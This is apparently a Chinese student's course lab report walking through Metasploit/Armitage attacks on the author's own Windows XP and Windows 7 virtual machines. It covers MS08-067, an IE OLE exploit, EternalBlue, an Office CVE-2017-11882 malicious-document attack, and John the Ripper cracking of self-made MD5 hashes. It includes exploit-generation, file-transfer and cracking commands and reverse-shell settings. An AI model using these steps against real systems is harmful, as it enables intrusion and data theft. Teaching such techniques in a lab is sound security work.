2017-2018-2 20155314《網絡對抗技術》Exp5 MSF基礎應用

目錄

• 實驗内容
• 實驗環境
• 基礎問題回答
• 預備知識
• 實驗步驟——基于Armitage的MSF自動化漏洞攻擊實踐
  • Armitage基礎配置
  • ms08_067_netapi：自動化緩衝區溢位攻擊實踐
  • ms14_064_ole_code_execution：IE漏洞自動化攻擊實踐
  • ms17_010_eternalblue：“永恒之藍”自動化攻擊實踐
  • office_ms17_11882：Office漏洞自動化攻擊實踐
  • John the Ripper_linux密碼破解子產品：Armitage下Auxiliary輔助子產品應用
• 實驗中遇到的問題及解決過程
• 實驗總結與體會
• 參考資料

傳回目錄

本實踐目标是掌握metasploit的基本應用方式，重點常用的三種攻擊方式的思路。具體需要完成：

1. 一個主動攻擊實踐，如ms08_067（1分）
2. 一個針對浏覽器的攻擊，如ms11_050（1分）
3. 一個針對用戶端的攻擊，如Adobe（1分）
4. 成功應用任何一個輔助子產品（0.5分）

以上四個小實踐可不限于以上示例，并要求至少有一個是和其他所有同學不一樣的，否則扣除0.5分。

• macOS下Parallels Desktop虛拟機中（網絡源均設定為共享網絡模式）：
  • Kali Linux - 64bit（攻擊機，IP為

    10.211.55.10

    ）
  • Windows 7 - 64bit（靶機，IP為

    10.211.55.14

  • Windows XP Professional Version 2002 Service Pack 3（靶機，IP為

    10.211.55.16

• 用自己的話解釋什麼是

  exploit

  ,

  payload

  encode

  ：

  • exploit

    ：利用漏洞，将真正要負責攻擊的代碼傳送到靶機中。

  • payload

    ：載荷，實際上就是之前我們實驗中做到的shellcode，exploit把它傳送到靶機中後，它就負責執行相應的攻擊代碼。Skoudis在他的《決戰惡意代碼》中這樣寫道，病毒通常會做一些有害的或者惡性的動作。在病毒代碼中實作這個功能的部分叫做“有效負載”（payload）。payload可以實作任何運作在受害者環境中的程式所能做的事情，并且能夠執行動作包括破壞檔案删除檔案，向病毒的作者或者任意的接收者發送敏感資訊，以及提供通向被感染計算機的後門。

  • encode

    ：編碼，主要是為了避免之前的payload中出現壞字元，進而影響payload的功能，其次是為了實作免殺，不讓防毒軟體很輕易的就發現payload是攻擊代碼。

• Armitage基本介紹

  

  - Armitage是一款基于Java的Metasploit圖形界面化的攻擊軟體，可以用它結合 Metasploit中已知的exploit來針對主機存在的漏洞自動化攻擊。通過指令行的方式使用Metasploit難度較高，需要記憶的指令過多，而Armitage完美的解決了這一問題，使用者隻需要簡單的點選菜單，就可以實作對目标主機的安全測試和攻擊。Armitage良好的圖形展示界面，使得攻擊過程更加直覺，使用者體驗更好。因其操作的簡單性，尤其适合Metasploit初學者對目标系統進行安全測試和攻擊。
• Armitage攻擊目标主機的的一般方法

  - **目标網絡掃描**：為了确定目标主機所在網絡結構的網絡拓撲，為後續目标主機資訊搜尋和攻擊奠定基礎。
  - **目标主機資訊搜集**：為了收集目标主機的漏洞資訊，根據收集到的漏洞資訊可以利用Armitage在Metasploit中自動搜尋合适的攻擊子產品。
  - **目标主機攻擊子產品搜尋**：主要方法是依據發現的漏洞資訊尋找可以突破目标系統的現有漏洞利用子產品，為具體的攻擊方案制定提供盡可能多的可靠支撐。
             

• Armitage官網妹子鎮樓：

  

• 打開Kali攻擊機，在終端中輸入

  /etc/init.d/postgresql start

  指令啟動postgresql服務：

  

• 輸入

  armitage

  指令啟動Armitage：

  

  也可以通過菜單欄圖示直接打開Armitage！ 對就是這個一臉壞笑的科技感十足的妹子233

  界面如下：

  

• 由于本次實踐中靶機的IP已知，這裡可以直接導入靶機的IP，不過更一般的方法是根據已知資訊推導出目标主機所在網段的IP，掃描目标網段完整資訊，确認目标網絡拓撲結構以實施網絡偵查。依次選擇

  Hosts

  ->

  Nmap Scan

  Quick Scan(OS detect)

  

  填寫靶機所在網段

  10.211.55.0/24

  

  唔...這不就同樣給靶機掃出來了嗎！

  

• 選中靶機

  10.211.55.16

  ，右鍵選擇

  Services

  ，檢視靶機上開啟的服務：

  

  可見靶機的139端口開啟了netbios-ssn服務，445端口開啟了microsoft-ds服務～

• 10.211.55.16

  Scan

  ，Armitage會調用Metasploit的漏洞掃描子產品，定向掃描靶機，尋找存在的漏洞，為下一步确定攻擊方法提供參考依據：

  

  可見類似前幾次實驗在Metasploit中手動配置主機号、端口号等設定現在統統直接自動化了！
• 利用上一步中漏洞掃描得到的漏洞資訊，自動搜尋Metasploit攻擊子產品庫，尋找合适的攻擊子產品。選中靶機

  10.211.55.16

  ，依次選擇菜單欄

  Attacks

  Find Attacks

  ，Armitage會開始自動搜尋尋找合适的攻擊子產品：

  

• 搜尋完成，Happy hunting_

  

• ms08_067漏洞介紹：

  This module exploits a parsing flaw in the path canonicalization code of NetAPI32.dll through the Server Service. This module is capable of bypassing NX on some operating systems and service packs. The correct target must be used to prevent the Server Service (along with a dozen others in the same process) from crashing. Windows XP targets seem to handle multiple successful exploitation events, but 2003 targets will often crash or hang on subsequent attempts. This is just the first version of this module, full support for NX bypass on 2003, along with other platforms, is still in development.

  • ms08_067_netapi是一款Metasploit中有點老的溢出攻擊載荷，攻擊可以獲得一個相對高的權限。
• 在利用Armitage完成對靶機的攻擊子產品自動化搜尋以後，選中

  10.211.55.16

  主機右鍵可以發現多了

  Attack

  菜單。依次選擇

  Attack

  smb

  ms08_067_netapi

  菜單，選擇smb漏洞下的ms08_067漏洞對XP靶機進行攻擊（也可以在Armitage左側樹型目錄下依次選擇

  exploit

  windows

  smb

  ms08_067_netapi

  找到該漏洞）：

  

• 在彈出的攻擊配置對話框中配置LHOST/RHOST、LPORT/RPORT等資訊（一般會自動配置好，這裡把LPORT改成學号），

  Targets

  處配置靶機的系統（一般預設自動檢測靶機系統），勾選

  Use a reverse connection

  ，點選

  Launch

  開始攻擊：

  

• Armitage會進行一系列自動化攻擊！攻擊完成後，可以看到靶機的圖示會發生明顯變化：

  

• Armitage會自動建立一個駐留在記憶體的shellcode即Meterpreter。在攻擊成功的靶機上右鍵選擇

  Meterpreter 1

  Interact

  Command Shell

  ，輸入

  dir

  指令檢視靶機

  C:\WINDOWS\system32

  目錄下的系統檔案：

  

  攻擊完成(⁎⁍̴̛ᴗ⁍̴̛⁎)：

  

• 在攻擊成功的靶機上右鍵選擇

  Meterpreter 1

  Interact

  Meterpreter Shell

  getuid

  指令檢視靶機目前使用者的權限是SYSTEM權限：

  

  

• ms14_064_ole_code_execution漏洞簡介：

  This module exploits the Windows OLE Automation array vulnerability, CVE-2014-6332. The vulnerability is known to affect Internet Explorer 3.0 until version 11 within Windows 95 up to Windows 10, and no patch for Windows XP. However, this exploit will only target Windows XP and Windows 7 box due to the Powershell limitation. Windows XP by defaults supports VBS, therefore it is used as the attack vector. On other newer Windows systems, the exploit will try using Powershell instead.

• 在Armitage左側樹型目錄下依次選擇

  exploit

  windows

  browser

  ms14\_064\_ole\_code\_execution

  找到該漏洞并輕按兩下打開配置界面開始配置。注意！此處需要把

  AllowPowershellPrompt

  置為1！！然後配置好LHOST/RHOST、LPORT/RPORT等資訊（把LPORT改成學号，其餘均取預設值），

  Targets

  處配置靶機的系統Windows XP，點選

  Launch

  

• Armitage會進行一系列自動化攻擊！

  

• 靶機打開IE浏覽器，輸入meterpreter提供的URL

  http://10.211.55.10:8080/0KO2YrGZdZ1viW/SrEsdO/

  并回車，在靶機看來似乎并沒有發生什麼！然而此時Armitage中靶機的圖示已發生明顯變化，表明Kali攻擊機已攻擊成功！！

  

  

• 開始操作一波吧_在攻擊成功的靶機上右鍵選擇

  Meterpreter 1

  ，發現除了上個攻擊實踐中檢視

  Command Shell

  和

  Meterpreter Shell

  功能之外，還具有檢視浏覽器檔案、程序、截屏等功能！
  • 選擇

    Explore

    Browse Files

    檢視浏覽器檔案：

    

  • Explore

    Show Processes

    檢視靶機程序（這個比較有用啊emmm）：

    

  • Explore

    Screenshot

    進行截屏（聽說你是截屏狂魔？）：

    

  • Explore

    Webcam shot

    調一波網絡攝像頭（顔控必備233）：

    

    什麼？！竟然沒裝攝像頭！欺騙我感情啊o(︶︿︶)o

• ms17_010_eternalblue漏洞介紹：

  This module is a port of the Equation Group ETERNALBLUE exploit, part of the FuzzBunch toolkit released by Shadow Brokers. There is a buffer overflow memmove operation in Srv!SrvOs2FeaToNt. The size is calculated in Srv!SrvOs2FeaListSizeToNt, with mathematical error where a DWORD is subtracted into a WORD. The kernel pool is groomed so that overflow is well laid-out to overwrite an SMBv1 buffer. Actual RIP hijack is later completed in srvnet!SrvNetWskReceiveComplete. This exploit, like the original may not trigger 100% of the time, and should be run continuously until triggered. It seems like the pool will get hot streaks and need a cool down period before the shells rain in again. The module will attempt to use Anonymous login, by default, to authenticate to perform the exploit. If the user supplies credentials in the SMBUser, SMBPass, and SMBDomain options it will use those instead. On some systems, this module may cause system instability and crashes, such as a BSOD or a reboot. This may be more likely with some payloads.

  • 百度上EternalBlue一般指去年爆發的WannaCry勒索病毒，實際上是該勒索病毒軟體利用了NSA洩露的危險漏洞EternalBlue進行傳播。關于WannaCry詳見WannaCry - 百度百科以及我去年寫的部落格應對WannaCry勒索危機之關閉445端口等危險端口——以本人Windows7系統為例～
  • 原理：
    • 利用Metasploit中近期更新的針對ms17-101漏洞的攻擊載荷進行攻擊擷取主機控制權限。
    • 利用windows系統的Windows SMB遠端執行代碼漏洞向Microsoft伺服器消息塊(SMBv1)伺服器發送經特殊設計的消息，能允許遠端代碼執行。
  • 主要用途：
    • Windows的SMBv1、SMBv2遠端溢出漏洞，對應MS17_010，主要針對445端口
  • 影響範圍：
    • 較廣，從WindowsXP到Windows server 2012
• 在Armitage菜單欄依次選擇

  Hosts

  Nmap Scan

  Quick Scan(OS detect)

  并填寫靶機所在網段

  10.211.55.0/24

  搜尋存活的主機：

  

  發現兩台可以攻擊的靶機，一台XP（IP為

  10.211.55.16

  ）一台win7（IP為

  10.211.55.14

  ）：

  

• 依次選擇菜單欄

  Attacks

  Find Attacks

  ，Armitage會開始自動搜尋靶機尋找合适的攻擊子產品，對于win7右鍵依次選擇

  Attack

  smb

  ，可以發現Armitage提供了5個可供攻擊的smb漏洞，選擇

  check exploits

  檢查這些漏洞是否能被攻擊：

  

  可以看到除了第一個漏洞

  ipass_pipe_exec

  沒有檢測結果不知道能否進行攻擊之外其他4個全部陣亡，要麼不可利用(not exploitable)要麼檢測不出來(not support check)：

  

  

  并沒有找到所謂的eternalblue，怎麼破？
• 别着急，這裡我們還是在Armitage左側樹型目錄下依次選擇

  exploit

  windows

  smb

  ms17_010_eternalblue

  找到傳說中的eternalblue永恒之藍并輕按兩下打開配置界面，相關配置均用預設值即可：

  

  特别注意的是，eternalblue是針對445端口進行攻擊的，攻擊成功與否關鍵在于靶機是否開放了這個端口!!!
• 點選

  Launch

  開始攻擊win7：

  

  

  攻擊不成功？！再來！
• 重新輕按兩下打開eternalblue配置界面，勾選

  Use a reverse connection

  Launch

  

  看看win7靶機的圖示，攻擊成功!!!

  

  檢視session并進入，擷取shell：

  

  接下來該幹什麼，你懂的_Happy hunting_
• 不過另一台靶機就沒那麼給面子了，可能由于eternalblue隻能攻擊Windows 7和Windows server 2008，攻擊xp時會顯示作業系統不比對攻擊不成功(._.)

  

• Microsoft Office CVE-2017-11882漏洞介紹：

  Module exploits a flaw in how the Equation Editor that allows an attacker to execute arbitrary code in RTF files without interaction. The vulnerability is caused by the Equation Editor, to which fails to properly handle OLE objects in memory.

  • 這是一個潛伏了17年之久的遠端代碼執行漏洞。該漏洞為Office記憶體破壞漏洞，影響目前流行的所有Office版本。原理是利用了Office的一個EQNEDT32.EXE（公式編輯器）元件，攻擊者能夠以目前登入的使用者的身份執行任意指令。詳細請參照打開文檔變殭屍電腦：潛伏17年的“噩夢公式”Office漏洞攻擊分析。
  • CVE-2017-11882漏洞影響版本：
    • Office 365
    • Microsoft Office 2000
    • Microsoft Office 2003
    • Microsoft Office 2007 Service Pack 3
    • Microsoft Office 2010 Service Pack 2
    • Microsoft Office 2013 Service Pack 1
    • Microsoft Office 2016
• 在win7靶機上安裝Microsoft Office 2016：

  

• 在Kali攻擊機中依次輸入以下指令生成doc測試檔案：
  • 安裝啟動nginx：

    apt-get install nginx
               

    cd /usr/share/nginx/html/
               

    systemctl start nginx
               

  • 下載下傳生成doc的python腳本：

    git clone https://github.com/Ridter/CVE-2017-11882.git
               

    cd CVE-2017-11882/
               

  • 生成測試檔案

    cve.doc

    （靶機在打開該測試檔案時同時會自動打開電腦程式

    calc.exe

    ，以驗證Office CVE-2017-11882漏洞的存在）：

    python Command43b_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o cve.doc
               

  • 将

    cve.doc

    放到網站根目錄：

    cp cve.doc /usr/share/nginx/html/
               

    ls /usr/share/nginx/html/
               

  

• 用ncat向靶機發送

  cve.doc

  • win7靶機用指令行進入ncat目錄，打開監聽：

    ncat.exe -lv 5314 > cve.doc
               

  • Kali攻擊機建立連接配接并傳輸：

    ncat -nv 10.211.55.14 5314 < cve.doc
               

  

• 靶機進入ncat目錄，打開

  cve.doc

  ，成功彈出

  calc.exe

  電腦程式，測試成功：

  

  

• exploit

  windows

  fileformat

  office\_ms17\_11882

  找到該漏洞并輕按兩下打開配置界面開始配置，注意有兩處配置需要手動修改：
  • FILENAME+一欄填寫生成doc檔案的名字

    cve2.doc

    ！
  • 設定URI路徑時要與上面生成doc時配置的路徑一緻！

    

• Launch

  開始自動化攻擊流程：

  

• 注意這條提示資訊！它指明了剛剛MSF生成的

  cve2.doc

  所在路徑！

  

  然後我們進入該目錄并用ncat把

  cve2.doc

  傳到靶機上：

  

• win7靶機進入ncat目錄，打開

  cve2.doc

  ，觸發通路

  10.211.55.10:8080/5314

  就會得到反彈到

  5314

  端口的TCP會話：

  

  于是可憐的靶機又被我攻陷了哈哈哈哈哈!!

  

  來抓個屏笑一個？_

• jtr_linux密碼破解子產品簡介：

  This module uses John the Ripper to identify weak passwords that have been acquired from unshadowed passwd files from Unix systems. The module will only crack MD5 and DES implementations by default. Set Crypt to true to also try to crack Blowfish and SHA implementations. Warning: This is much slower.

  • 用途：最流行的密碼破解器，用于破解弱密碼Hash（預設隻破解MD5和DES，将Crypt選項置為true也能夠慢速破解Blowfish和SHA）
• John the Ripper簡介：

  The John The Ripper module is used to identify weak passwords that have been acquired as hashed files (loot) or raw LANMAN/NTLM hashes (hashdump). The goal of this module is to find trivial passwords in a short amount of time. To crack complex passwords or use large wordlists, John the Ripper should be used outside of Metasploit. This initial version just handles LM/NTLM credentials from hashdump and uses the standard wordlist and rules.

  • JTR官網：John the Ripper - Metasploit Unleashed
  • 原理：JTR（以及任何離線密碼破解器）的工作方式是計算清單（或所生成的）單詞的Hash，并将它們與需要被破解的Hash對比，當存在比對時它就假設密碼找到了。
• 首先我們需要以特定格式設定使用者名和密碼Hash（這裡選擇用MD5線上生成）：
  • 通路MD5線上加解密網站CMD5，在上方【密文】處輸入一段字元串，下方【查詢結果】處就立即顯示出結果（隻要不超過31位，否則會卡住233）：

    

  • 分别将不同使用者名對應的密碼經過MD5線上加密之後得到Hash值，獲得下面這張表：

    使用者名	密碼	Hash
    admin		21232f297a57a5a743894a0e4a801fc3
    user		ee11cbb19052e40b07aac0ca060c23ee
    Tom	password	5f4dcc3b5aa765d61d8327deb882cf99
    jtr_linux	abc123	e99a18c428cb38d5f260853678922e03
    20155314	qwertyu123.	682e9cfe26d949a10009cfc9969076ad
    [email protected]	kxjsjc_wx_1553	d80b3f4f2517d9a3ecf2a1e8031f6ff1

• 在Kali攻擊機中建立一個名為

  hashes.txt

  的文本檔案，把表中資訊添加進去，每行包含一個使用者名和一個Hash，以

  :

  分隔（

  username:hash

  

• auxiliary

  analyze

  jtr_linux

  并輕按兩下打開開始配置，配置好JOHN_PATH然後點

  Launch

  

• 用

  show options

  指令還可以檢視子產品的有效選項及其較長的描述：

  

• Armitage會為我們生成一個單詞清單檔案WordList，但是不知道什麼原因它并沒有識别出我的

  hashes.txt

  而報錯:(

  

• 此時我們手動使用剛剛Armitage生成的單詞清單進行破解，打開終端并執行以下指令：

  john --wordlist=/tmp/jtrtmp20180502-5917-ctqwpk --format=raw-md5 hashes.txt
             

  

  可以看到單詞清單中6個密碼破解了4個。我們還能看出，John每秒能嘗試10,013,000次(10,013KC/s)!!!
• 至于剩下的兩個，可能是我把密碼設定得太複雜的原因吧一直沒破解出來(ｰ ｰ;)将

  --wordlist

  選項去掉采用暴力破解的方式也一直沒跑出來(ｰ ｰ;)時間原因跑了不到10分鐘就被我掐掉了感覺速度還是比彩虹表要慢很多啊(ｰ ｰ;)

啟動Armitage時報錯提示Could not connect to database

解決方案

• 根據提示在終端中輸入

  /etc/init.d/postgresql start

  指令啟動postgresql服務，重新開機Armitage即可：

  

  Hacker的漏洞攻擊也不是萬能的。本次漏洞攻擊實驗讓我感到非常疲憊，從周三開始裝各種虛拟機挨個找漏洞一直弄到周六才難得成功第一次攻擊。在做第一個ms08_067漏洞攻擊時，首先是靶機作業系統的選擇上，由于第一個經常使用的win7虛拟機已在清明假期被我用騰訊電腦管家打好了更新檔很可能沒辦法實施攻擊，是以我先拿PKI實驗課上裝的沒有任何安全防護的win7客戶機做試驗，發現不行，那就換xp試試呗！然後我便用硬碟裡珍藏多年的xp professional鏡像安裝了一個xp虛拟機，興高采烈地配置好Armitage，一攻擊發現還是不行！！最後問了很多大佬才知道用英文版的xp可以成功，但這我還是攻擊了好幾次的結果……而“永恒之藍”的攻擊更是連xp都不行而隻能用PKI的win7虛拟機才能完成……總的來說，漏洞攻擊因“機”而異，尋找漏洞更是完全取決于Hacker的眼力和本領。網絡攻防其實就是“找漏洞”和“堵漏洞”之間的較量，而所謂“道高一尺魔高一丈”，漏洞攻擊更具有先手優勢。如今，在安全技術已經比較成熟的幾大主流作業系統又在各種知名殺軟的保護加持之下，往往被使用者認為相對“安全”，但一個新漏洞的發現往往能引起軒然大波，拿到“黑市”中去賣能一夜暴富；更有甚者如去年不法分子利用NSA武器庫洩漏的危險漏洞“永恒之藍”制作出一款蠕蟲式勒索病毒軟體WannaCry并借助網絡大範圍傳播，鎖定被感染使用者的系統、加密全部資料并向直接其索取高額比特币，導緻一場全球性網際網路災難！

  給我們的啟示在于，打更新檔的方式雖然可以防範漏洞攻擊，但這畢竟是被動的，是在攻擊發生之後采取的行為。首先從源頭上來說，作業系統研發者就不應該讓這些攻擊成為可能，但無奈地球上畢竟不存在完美的程式猿，寫代碼時難免會産生bug。從安全人員的角度來看，要保護一個系統，必須主動一點，像Hacker那樣并搶在Hacker之前對目前系統可能存在的所有漏洞進行檢測，把漏洞堵起來，不安全的因素找出來，各種安全屏障立起來，讓Hacker無機可乘！

最後還是要感謝一下一路陪我走來的Mac，他的性能足夠強勁以至于讓我能同時開3個虛拟機做滲透測試(>\_<)辛苦啦(>\_<)

注：實驗六主要部分已在本篇部落格中有所展現，其餘實踐内容請參見2017-2018-2 20155314《網絡對抗技術》Exp6 資訊搜集與漏洞掃描！

• Kali-linux使用Metasploit基礎 - TyrantMaster - 部落格園
• Armitage攻擊winxp——P201421410029 - 部落格園
• [玩轉Metasploit第一節]Ms08_067_netapi利用與使用Nmap驗證掃描
• 【技術分享】MSF架構實作“永恒之藍”的閃電攻擊
• MS-2017-010（Eternalblue）EXP移植Metasploit攻擊
• NSA Eternalblue SMB 漏洞分析 - 360安全衛士技術部落格
• 方程式ETERNALBLUE：Windows SMB遠端溢出漏洞複現筆記 - CSDN部落格
• 關于NSA的EternalBlue（永恒之藍） ms17-010漏洞利用
• 手把手教你用永恒之藍（Eternalblue）勒索病毒漏洞的高階用法
• WannaCry - 百度百科
• 應對WannaCry勒索危機之關閉445端口等危險端口——以本人Windows7系統為例 - 20155314劉子健 - 部落格園
• cve-2017-11882漏洞利用 - 簡書
• Office隐藏17年的漏洞CVE_2017_11882測試記錄 - CN_Simo - 部落格園
• Office CVE-2017-11882本地複現 - CSDN部落格
• CVE-2017-11882漏洞 Msf利用複現 - CSDN部落格
• Kali Linux Web 滲透測試秘籍 第七章 進階利用 - CSDN部落格